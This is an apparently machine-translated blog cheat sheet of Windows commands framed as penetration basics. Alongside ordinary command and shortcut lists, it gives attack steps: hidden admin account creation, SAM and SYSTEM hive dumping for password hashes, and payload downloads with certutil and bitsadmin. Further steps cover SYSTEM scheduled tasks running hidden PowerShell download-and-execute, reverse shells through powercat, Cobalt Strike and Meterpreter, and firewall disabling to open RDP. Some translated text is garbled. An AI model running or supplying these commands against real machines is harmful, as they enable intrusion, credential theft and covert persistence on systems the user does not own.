Windows penetration basic commands that must be seen by security beginners

Here I recommend my official account number: programmer sailing.

Windows development history

Microsoft Windows At first, it was developed by Microsoft in 1985 and gradually became the most popular version of Microsoft's operating system.


Version numberRelease time


Version numberRelease time
Windows951995.8 (with start button and menu bar)
Windows98June 1998 (real graphical interface system)


Version numberRelease time
Windows 2000 (NT5.0)2000
Windows XP (NT5.1)Stop updating on October 2001 and April 2009
Window Vista (NT6.0)Update stopped on January 2007 and July 2011. All support stopped in April 2017
Windows 7 (NT6.1)2009.7 2020.1 stop all support
Windows 8 (NT6.3)2012.10
Windows 8.12013.10
Windows 10 (NT10.0)2015.7

Windows Server

Version numberRelease time
Windows Server 2003Stop updating on March 2003 and July 2015
Windows Server 20082008.2
Windows Server 20122012.9
Windows Server 20162016.10

Common directories in Windows

C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup   This directory stores the program started by the user
C:\programData\Microsoft\Winodws\Start Menu\Programs\StartUp   This directory stores the startup and self startup program
C:\Windows                                 This directory is the installation directory of the system
C:\Windows\System32                       This directory holds the configuration files of the system
C:\Windows\System32\config\SAM             Under this directory SAM The file stores the user's login account and password. To know the account and password, you need to enter PE The system deletes this file, corresponding to the system process: lsass.exe
C:\PerfLogs                               This is the system log directory

Common cmd commands in Windows

#system information 
CHCP 65001                           Modify font code as UTF-8
systeminfo                           View system information
hostname                             View host name
SET                                 View environment variables
color                               change cmd colour
cls                                 Clear screen
set                                 View environment variables
set path                             View specified environment variables
ping -t  -l  65500  ip               Of death ping
ipconfig    /release                 release ip
ipconfig    /renew                   Regain ip
ipconfig    /flushdns               Refresh DNS cache
route print                         Print routing information
arp -a                               see arp cache
net view                             View other computer names in the LAN
netsh firewall show state           Firewall status
netsh firewall show config           Firewall rules
whoami                               View the current user of the system
net user                             See who the users are
net user xie                         View user xie Information
net localgroup                       View group
net localgroup administrators         View group administrators Information
net user  hack   123  /add           Create a new user hack,The password is 123
net user  hack$  123  /add           Create a new hidden hack User, password 123
net user  hack   /del                 delete user hack
net localgroup  administrators  hack  /add   Ordinary users hack Raise authority to administrator
net user  guest  /active:yes         activation guest user
net user  guest  /active:no           close guest user
net password   password                   Change the password of the current login user of the system
net user guest password                   change guest User password
#Port process service
tasklist                             View process
tasklist  /v                         View the process and display the process subject name
netstat  -ano                       View system open ports
netstat  -ano|findstr 80             View the corresponding of port 80 PID
tasklist | findstr 80               View the process corresponding to port 80
taskkill /f /t /im xx.exe           kill xx.exe process
taskkill /F -pid 520                 kill pid Process for 520
net start                           Check which services are enabled
net start telnet                     open telnet service
net stop  telnet                     stop it telnet service
start               Open URL
net use                               View connections
net share                             View locally opened shares
net share ipc$                       open ipc$share
net share ipc$ /del                   delete ipc$share
net share c$ /del                     delete C Disk sharing
net use \\\ipc$ /u:"" ""     And establish ipc Empty connection
net use \\      /u:"" ""     And establish ipc Empty connection, OK ipc$Remove
net use \\ /u:"administrator" "root"   with administrator Identity and establish ipc connect
net use \\ /del             delete ipc connect
net use \\\c$  /u:"administrator" "root"   establish C Disk sharing
dir \\\c$                 View Disk file
dir \\\c$\user             View Under disk file user catalogue
dir \\\c$\user\test.exe   View Under disk file user Directory test.exe file
net use \\\c$  /del       Delete the C Disk sharing connection
net use k: \\\c$  /u:"administrator" "root"   Target C Disk mapping to local K disc
net use k: /del                                             Delete the mapping
#File operation 
echo  hello,word > 1.txt             Xiang 1.txt Write in hello,word
echo  hello,word >>1.txt             Xiang 1.txt Add in hello,word
del                                   Delete a file
deltree                               Delete the folder and all subfolders and files below it
ren 1.txt  2.txt                     Will 1.txt Rename to 2.txt
type  1.txt                           View 1.txt Contents of the document
md                                   Create a folder
rd                                   Delete a folder
move  1.txt  d:/                     Will 1.txt Move files to d Under disc
type  123.txt                         Open 123.txt file
dir c:\                               see C Files on disk
dir c:\ /A                           see C All files on the disk, including hidden files
dir c:\ /S                           see C Files under disk and its subfolders
dir c:\ /B                           Show only C File name under disk
shutdown -s -t 60 -c "Your computer is hacked "         -s Shut down -r restart -a cancel
copy con A.txt   establish A.txt text file; 
 hello,word      Input content; 
    Press CTRL+Z Key, and then enter;

reg save  hklm\sam  sam.hive
reg save  hklm\system  system.hive
 These two files are windows The user account database, login name, password and other relevant information of all users will be saved in the file. These two commands are to obtain windows Administrator's hash value


File download of cmd window in Windows (bitsadmin, certutil, iwr)

Whether bitsadmin or certutil, the downloaded files should be placed in the directory with permission, otherwise the permission will be rejected


certutil is also a tool for downloading files under windows. It has been included since Windows Server 2003. However, there will be problems when using Server 2003. In other words, the following commands are used on Win7 and later machines.

certutil -urlcache -split -f # download the file to the current directory
certutil -urlcache -split -f  c:/users/xie/desktop/shell.php # downloads the file to the specified directory

However, the use of this command will lead to the killing of anti-virus software, so it is hardly applicable to the actual penetration


Bitsadmin can be used to download files from the windows command line. Bitsadmin is a tool of Windows Background Intelligent transmission service. It is used to automatically update windows and download patches. Windows Server2003 and XP do not have bitsadmin, but only Winc7 and later machines.

Some features of bitsadmin:

·bitsadmin can download files in the unstable state of the network. If there is an error, it will automatically retry. The reliability should be quite good.

·bitsadmin can follow the URL to jump

·bitsadmin is not used to Download HTML pages like curl wget.


bitsadmin /transfer test  c:\users\xie\desktop\shell.php
# "Task name" can be set at will. The file path to save the file must be an existing directory, otherwise it cannot be downloaded.

After downloading

By default, the download speed of bitsadmin is extremely slow. Priority needs to be set to speed up the download of large files. The following is a usage example

start bitsadmin /transfer test  f:\test.exe
bitsadmin /setpriority test foreground     #Set task test to highest priority

Related articles: Use bitsadmin Exe download files, with BCN Bat play more tricks


iwr is a tool under PowerShell, so if we execute this command under cmd, we need to add a PowerShell command in front, but this will be detected by the security software. Therefore, it is recommended to enter PowerShell before implementation

iwr -Uri -OutFile vps.exe -UseBasicParsing


Scheduled tasks in Windows

schtasks is a command to plan tasks under windows. It can be set to execute specified programs or scripts at a specified time.

Create a named on the target host test The starting procedure is C:\vps.exe,Start permission is system,The start-up time is per hour
schtasks /create /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f

schtasks /create /tn test /sc onstart/onlogon/HOURLY /mo 1 /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://xx.xx.xx.xx'''))'" /ru system /f

Query this test Plan task
schtasks /query | findstr test

Start the test Plan task
schtasks /run /i /tn "test"

Delete the test Plan task
schtasks /delete /tn "test" /f

Parameter: / tn: Specifies the name of the scheduled task

/sc: specify when to start

·/sc onstart executes the planned task when the system starts

·/sc onlogon executes the planned task when the user logs in

·/sc onidle -i 30 executes the scheduled task every 30 minutes in idle mode

·/sc hourly executes the scheduled task every hour

·/sc minute executes the scheduled task every other minute

/ed: specifies when to stop the planned task. If this parameter can be used, the planned task will continue to be executed. You can also specify a specific time:

· /ed 01/10/2020 -ET 20:00

/tr: Specifies the program or script to run

/ru: with what permissions, it can be system or% USERNAME%


Load and execute PowerShell scripts in Windows

Windows PowerShell is a command-line shell and scripting environment that enables command-line users and script writers to take advantage of .NET Framework Powerful functions of.

Windows XP and Windows Server 2003 do not have PowerShell, but Win7, 2008 Server and later do. More about PowerShell usage: Analysis on the use of PowerShell

Load and execute PowerShell scripts locally

There is powerview in the current directory of cmd PS1 script and execute the get netdomain module

powershell -exec bypass Import-Module .\powerview.ps1;Get-NetDomain  

Download and execute PowerShell scripts remotely

Remotely download and execute test PS1 script, remote download powerview PS1 script and execute the get netdomain module

powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/test.ps1')
powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/powerview.ps1');import-module .\powerview.ps1;Get-NetDomain


Batch files in Windows

@echo off           Indicates that all commands running after this statement do not display the command line itself
echo                 Show text after this line
title               title 
rem                 Annotation command
cls                 Clear window
set /a               assignment
set /p  name=       Accept user input,Save in name in
%name%               Output user input
if   else           judge
FOR /F %%i in (ip.txt) do echo %%i       #Loop print out IP Txt, the same window
FOR /F %%i in (ip.txt) do start echo %%i       #Loop print out IP Txt, different windows
GEQ                 Greater than or equal to
LSS                 less than
goto   :1 :2         Jump to
exit                 Exit program
start               Startup file
call                 Call another batch file
dir c:\*.*>a.txt     take C Disk file list write a.txt
del                 delete one or more files

Shortcut key operation in Windows

Alt+Tab               Fast switching program
Alt+F4               Quick shutdown procedure
Alt                   rectangular selection
Alt+Double click the file           View file properties
Shift+delete         Permanently delete files
Ctrl+.                Punctuation switching between Chinese and English
Ctrl+S               preservation
Ctrl+N               newly build
Ctrl+W               close program
Ctrl+U               Underline
Ctrl+Z               Undo operation
Ctrl+B               bold
Ctrl+I               Italics
Ctrl+shift+esc       Quick open Task Manager
Win+D                 Quickly return to the desktop
Win+I                 Quick open Settings
Win+A                 Open operation center
Win+Q                 Open voice assistant cortana
Win+X                 open windows function
Win+Pause             Properties of my computer

Commands for running Windows in Windows

dxdiag               Query computer hardware configuration information
control               control panel
services.msc         service
msconfig             system configuration
regedit               registry
ncpa.cpl             network connections
firewall.cpl         firewall
devmgmt.msc           Device manager 
diskmgmt.msc         Disk management utility
compmgmt.msc         computer management 
winver               inspect Windows edition  
write                 Writing board
mspaint               Drawing board
mstsc                 Remote Desktop Connection 
magnify               Magnifying glass utility 
notepad               Open Notepad
shrpubw               Create shared folder 
calc                 start calculator 
osk                   Open on-screen keyboard

Registry in Windows

Registry is an important database in Microsoft Windows, which is used to store the configuration information of systems and applications

· HKEY_CLASSES_ROOT manages the file system. According to the extension of the application installed in windows, the root key indicates the name of its file type, the program to be called to open the file, and so on.

· HEKY_CURRENT_USER manages the current user information of the system. In this root key, the current login user information stored in the local computer is saved, including the user login user name and temporary password.

· HKEY_LOCAL_MACHINE manages the current system hardware configuration. The local computer hardware configuration data is saved in this root key, and the subkeywords under this root key are included in system Dat is used to provide HKEY_ LOCAL_ Information required by machine, or in a set of keys accessible from a remote computer

· HKEY_USERS manages the user information of the system. In this root key, the user ID and password list stored in the password list of the local computer are saved. At the same time, the preconfigured information of each user is stored in HKEY_USERS is in the root key. HKEY_USERS is one of the root keys for access in the remote computer.

· HKEY_CURRENT_CONFIG manages the system configuration of the current user. In this root key, the data defining the desktop configuration of the current user and the list of documents used by the user are saved.

Use reg to save the sam, system and security files in the registry

The following commands require administrator privileges to execute

reg save hklm\sam c:\users\mi\desktop\sam
reg save hklm\system c:\users\mi\desktop\system
reg save hklm\security c:\users\mi\desktop\security


Ports in Windows

·Recognized ports: recognized ports are also known as common ports, including 0-1023 ports

·They include ports 491024-151, which are loosely bound to services

·Dynamic / private ports: dynamic / private ports include 49152-65535, which are usually not assigned services.

Close port:

Closing the port in the command line mode actually calls the firewall. Open the cmd window with administrator privileges and execute the following command. The following is a demonstration of closing port 139

netsh advfirewall set allprofile state on
netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139   #If you want to close other ports, just replace 139 with other ports

You can also close it directly in the graphical interface of firewall:

Then just go on to the next step


Processes in Windows

windows includes system process and program process.

ctrl+shift+esc opens the task manager to view the process information. The user name SYSTEM is the SYSTEM process.

Some common system processes and meanings:

· conime.exe: the system process related to the input method editor, which can ensure the normal adjustment and editing of the input method in the system

· csrss.exe: this process is a Microsoft client / server runtime subsystem, which manages windows graphics related tasks

· ctfmon.exe: this process is related to the input method. The normal operation of this process can ensure that the language bar can be displayed in the taskbar normally

· explorer.exe: this process is a windows Explorer, which can be said to be a windows graphical interface shell program. The normal operation of this process can ensure that the desktop icon and taskbar are displayed on the desktop

· lsass.exe: it is used for the security mechanism, local security and login policy of windows operating system

· services.exe: this process is used to start and stop services in the system. If the user manually terminates the process, the system will restart the process

· smss.exe: this process is used to call the dialogue management subsystem, which is responsible for the dialogue between the user and the operating system

· svchost.exe: This is the general host process name of the service running from the dynamic link library (DLL). If the user manually terminates the process, the system will restart the process

·System: this process is a windows page memory management process, which can ensure the normal startup of the system

·system idle process: this function is to issue a command when the CPU is idle to suspend the CPU, so as to effectively reduce the temperature of the CPU core

· winlogon.exe: this process is a Windows NT user login program, which is mainly used to manage user login and logout.

Common antivirus software processes

processSoftware name
360sd.exe360 antivirus
360tray.exe360 real time protection
ZhuDongFangYu.exe360 active defense
KSafeTray.exeJinshan guard
SafeDogUpdateCenter.exeServer security dog
McAfee McShield.exeMcAfee


Listening port netstat

The netstat command is used in windows to listen for ports

·Displays a list of all valid connection information, including LISTENING connection request (LISTENING), ESTABLISHED connection (ESTABLISHED), CLOSE_WAIT or TIME_WAIT: netstat -a

·Displays the address and port number in numeric form: netstst -an

·In addition to displaying this information, the PID of the process is also displayed: netstat -ano

·View the PID of the application corresponding to the occupied port 80: netstat -ano | findstr 80

·Check which process or program occupies port 80: tasklist | findstr 80

·End the process or program: taskkill / F / T / im XX Exe / F kill all processes and / t force kill / im use the image name as the process information

·Kill the process with specified PID: taskkill -F -pid 520 kill the process with PID 520


Windows bounce Shell

Rebound NC shell with Powershell in cmd window

All machines are suitable for personal testing

powershell IEX (New-Object System.Net.Webclient).DownloadString('');powercat -c -p 8888 -e cmd
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('');powercat -c -p 8888 -e cmd.exe"

Rebound CobaltStrike shell with Powershell in cmd window

Windows 10 cannot be used frequently. windows 2008R2 is applicable below 100%.

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(' ') "# background operation

powershell.exe  -c "IEX ((new-object net.webclient).downloadstring(''))"  

Rebound MSF shell under cmd window

Operations on VPS

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport=7788 -f psh-reflection >7788.ps1        #Generate Trojan file 7788 ps1
python -m SimpleHTTPServer 80  #Open web service
#MSF listening
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport 7788
exploit -j


Operation of target machine

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('');xx.ps1 "# background operation
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('');xx.ps1"


One click to open 3389 remote desktop

First query the port of RDP

tasklist /svc | findstr TermService
netstat -ano | findstr Found in the previous step PID

The following commands require administrator privileges to run

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
If you still can't connect, it's a firewall problem. You need to turn off the firewall or turn on the firewall running port 3389
 Turn off the firewall:
   netsh firewall get opmode disable (WIN2003 before)
   netsh advfirewall set allprofiles state off (WIN2003 after)
Firewall allows 3389 ports:
   netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Firewall operation

View firewall configuration: netsh firewall show config
 Set firewall log storage location: netsh advfirewall set currentprofile logging filename "C:\Windows\temp\FirewallLOG.log"
Turn off the firewall:
  netsh firewall get opmode disable (WIN2003 before)
  netsh advfirewall set allprofiles state off (WIN2003 after)
Allow full connection of a program
  netsh firewall add allowdprogram C:\nc.exe "allow nc" enable   (WIN2003 before)
Allow a program to connect
  netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
Allow a program to be connected externally
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
Open port 3389
  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

The article ends here. It's not only difficult for working programmers, but also difficult for everyone

I've been learning how to write articles since I retired. To be honest, I'm very glad to see the responses of some readers in the background. I'm a beginner and a silly uncle for we media... In order to thank the readers, I want to contribute some of my collection of programming dry goods to everyone and give back to every reader. I hope I can help you.

Dry goods mainly include:

① More than 2000 Python e-books (both mainstream and classic books should be available)

② Python standard library materials (the most complete Chinese version)

③ Project source code (forty or fifty interesting and classic hand training projects and source code)

④ Videos on basic introduction to Python, crawler, web development and big data analysis (suitable for Xiaobai)

⑤ Summary of all Python knowledge points (you can find out all directions and technologies of Python)

*If you can use it, you can take it away directly. You can take it away by yourself in my QQ technology exchange group (pure technology, no advertising). The group number is 421592457*

Keywords: Python Linux Windows

Added by Skittlewidth on Thu, 17 Feb 2022 21:00:11 +0200